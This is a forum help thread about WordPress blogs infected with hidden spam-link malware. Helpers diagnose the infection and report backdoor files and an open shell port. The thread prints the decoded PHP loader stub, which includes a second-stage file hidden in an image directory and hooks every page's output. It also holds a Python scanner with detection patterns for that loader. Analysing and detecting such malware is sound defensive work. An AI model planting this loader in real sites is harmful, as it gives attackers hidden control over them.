Several Wordpress Blogs Hacked with Outbound Comments HTML Links

Hannahro11
Hello,

We need someone to help us fix a Wordpress hack job where all of the Wordpress sites on our own server appear to have been hacked by the same breach. This hack is pretty insidious in that it installs hidden outbound links in the stylesheet. Once we hit "approve" on comments it bleeds the blog dry of all page rank (SEO terminology). We do not know how this hole occurred, and we want to fix it on our server. I have attached an example of the hack as it appears in the area compromised. This has occurred on all the blogs in this jail on our server.

The attached file, 'hacked text at bottom of posts.txt', is a sample of what's appended to the post when you view the source - not viewable on the webpage via a browser.
 
The second text (php-hack): I've manually replaced all of the php files in the blog and the theme - there had been a block of encrypted stuff at the top of many php scripts, the main php scripts for the theme and the main wp style sheet - attached is a sample of that, too; php-hack.txt

Again, let us know if you can help.

php-hack.txt
blog-hack-1.txt

Jason C. Levine

Commented:
Hi Hannahro11,

Typically what bad guys do is compromise the server via an FTP or shell account and then setup a script that seeks out WordPress (because it is so common) and alters the files there to redirect or display different content.

Is this your own server or is it hosted?

Author

Commented:
It is our own server.

Author

Commented:
You are right, this means that the Shell may have been compromised without Cpanel. Or each blog was compromised individually. Strange. What to do. (smile)
Jason C. Levine

Commented:
My expertise in this sort of ends with WordPress. I've seen these types of hacks before, which is why I commented.

You should probably hit Request Attention above and ask the Moderators to resend alerts.

I took a look at the encoded php file you sent and this is what the unencoded version looks like.

/*eoltijfbzgjhmixzqarebwipjfgniyhagohvmezlkpojkepldd*/
if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
    // Absolute path to the second-stage file hidden in a TinyMCE skin image directory
    $GLOBALS['mfsn'] = '/usr/local/www/blogs/getthetrafficnow/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/b88.php';
    if (file_exists($GLOBALS['mfsn'])) {
        include_once($GLOBALS['mfsn']);
        // If the second stage loaded, its dgobh() is registered as an output-buffer
        // callback, so every page the theme renders passes through it before being sent
        if (function_exists('gml') && function_exists('dgobh')) {
            ob_start('dgobh');
        }
    }
}

Do you still have a copy of that file b88.php? If so, can you attach it here? I believe that may be how they intended on gaining access after the fact; just want to confirm.
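The loader stub above has a recognisable shape: a long junk comment, a `$GLOBALS` entry pointing at a .php file under an image/skin directory, and `ob_start()` with a string callback. The following scanner (an added example, not code from this thread or from WordPress) walks a WordPress install and flags files that match two or more of those traits, or any .php file living under an `img`/`images`/`icons` directory; the sample tree is constructed for the example, and the path and function names in it are placeholders.

```python
import re
from pathlib import Path

# Heuristics drawn from the loader stub quoted in this thread.
SOURCE_PATTERNS = {
    "junk_comment": re.compile(r"/\*[a-z0-9]{20,}\*/"),                  # /*eoltijfb...*/
    "globals_path_to_php": re.compile(
        r"\$GLOBALS\[['\"][a-z0-9_]+['\"]\]\s*=\s*['\"][^'\"]+\.php['\"]"),
    "ob_start_callback": re.compile(r"ob_start\s*\(\s*['\"][a-z0-9_]+['\"]\s*\)"),
    "include_of_globals_path": re.compile(r"include(_once)?\s*\(\s*\$GLOBALS\["),
}
# PHP has no business sitting in an asset directory such as .../skins/.../img/
PHP_UNDER_ASSET_DIR = re.compile(r"/(img|images|icons)/.*\.php$")

def score_php_source(src: str) -> list:
    """Return the names of the source heuristics that match this PHP text."""
    return [name for name, rx in SOURCE_PATTERNS.items() if rx.search(src)]

def scan_tree(files: dict) -> dict:
    """files maps relative path -> PHP source. Returns {path: [reasons]} for suspects."""
    findings = {}
    for rel, src in files.items():
        hits = score_php_source(src)
        if PHP_UNDER_ASSET_DIR.search(rel):
            hits.append("php_under_asset_dir")
        if len(hits) >= 2 or "php_under_asset_dir" in hits:
            findings[rel] = hits
    return findings

def scan_directory(root) -> dict:
    """Convenience wrapper: load every .php file under root and scan it."""
    root = Path(root)
    return scan_tree({p.relative_to(root).as_posix(): p.read_text(errors="ignore")
                      for p in root.rglob("*.php")})

# Constructed sample tree: one infected theme header, one dropped second stage, one clean file.
SAMPLE_TREE = {
    "wp-content/themes/example/header.php":
        "<?php /*" + "q" * 40 + "*/ if(function_exists('ob_start')&&!isset($GLOBALS['xyz'])){"
        "$GLOBALS['xyz']='/var/www/blog/wp-includes/js/tinymce/plugins/p/skins/s/img/b88.php';"
        "if(file_exists($GLOBALS['xyz'])){include_once($GLOBALS['xyz']);"
        "if(function_exists('gml')){ob_start('dgobh');}}} ?><?php get_header(); ?>",
    "wp-includes/js/tinymce/plugins/p/skins/s/img/b88.php": "<?php /* stand-in for the second stage */ ?>",
    "wp-content/themes/example/footer.php": "<?php wp_footer(); ?>",
}

if __name__ == "__main__":
    for path, reasons in scan_tree(SAMPLE_TREE).items():
        print(path, "->", ", ".join(reasons))
```

Legitimate plugins do call `ob_start()` with a callback, which is why a single trait is not enough on its own; review anything flagged by hand before deleting it.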

Author

Commented:
I am checking with the server admin and will get right back. Thank you very much for the right question, by the way.
What did they have to say?

Author

Commented:
Hi Russell, he is still looking at it. Sorry long night. (smile)
Are there more encrypted files? Also, what version of WordPress is being used? Any specific plugins being used?

Author

Commented:
Yes, I finally got the encrypted files. Attached.

a bit more background...
 
I had painstakingly removed the encoded stuff from all the php files, so I grabbed a header from a file on a different blog in my network.

the b88.php file exists on this other blog, not on the blog that I attached files for previously.
 
not sure what to make of that...
 
but here is the b88.php file
 
In the same folder there was a mysterious c120.php file and sure enough, when I look at it, it's encoded as well...
 
so both files are zipped up and attached.
 
I'll see if I can find one of the old infected files from the original blog (our most profitable site); I might have kept a copy somewhere. Also, we are new to Experts-exchange and are sort of interested in who you are (Russell Venable), as we have issues come up all the time.

encoded-header-1.txt
c120.txt
b88.txt
Welcome to EE! My Profile pretty much sums it up. I am not sure exactly what you want to know.  I will take a look at the files and see what I can come up with.
Ok, I have good news and I have bad news. Let's start with the bad news. You may have a shell running on your system right now on port 31373. You need to make sure that port is closed ASAP! The good news is I decrypted all the files in question successfully. I will not be posting the unencrypted versions here for many good reasons.

Both b88.php and c120.php are Trojan backdoors, and they vary in how they work. b88.php is what is creating those links on your page. c120.php, on the other hand, is a shell script backdoor that allows the person who uploaded it to gain access whenever they like. The rest of the files were some kind of spam link generation code. Has the admin looked at the security logs for the past week? I would check them and also start logging http traffic and block the aforementioned port. As for how they got onto the system, I will need to know a few details about the system. If you are uncomfortable talking about it here, I have an email address you can use to contact me. We will get to the bottom of this.

I broke the password to the shell and also found another Trojan. You should be able to find it and remove it at /images/icons/32/5cc.php

Author

Commented:
Hello Russell,
Pretty blown away by this. I will take this to my administrators now and see what they both say. I will get back to you as soon as I have their response. Thanks a lot my friend. Be right back.

Author

Commented:
Hi Russell.

I think we are uncomfortable talking about this here. Can you email me at <removed> so we can move forward with your line of reasoning?

Thank you.

My name is also Russell.
Will make sure of that. Just don't want their personal business posted all over EE.
I plan on it :)
Hannahro11, sent you an email.
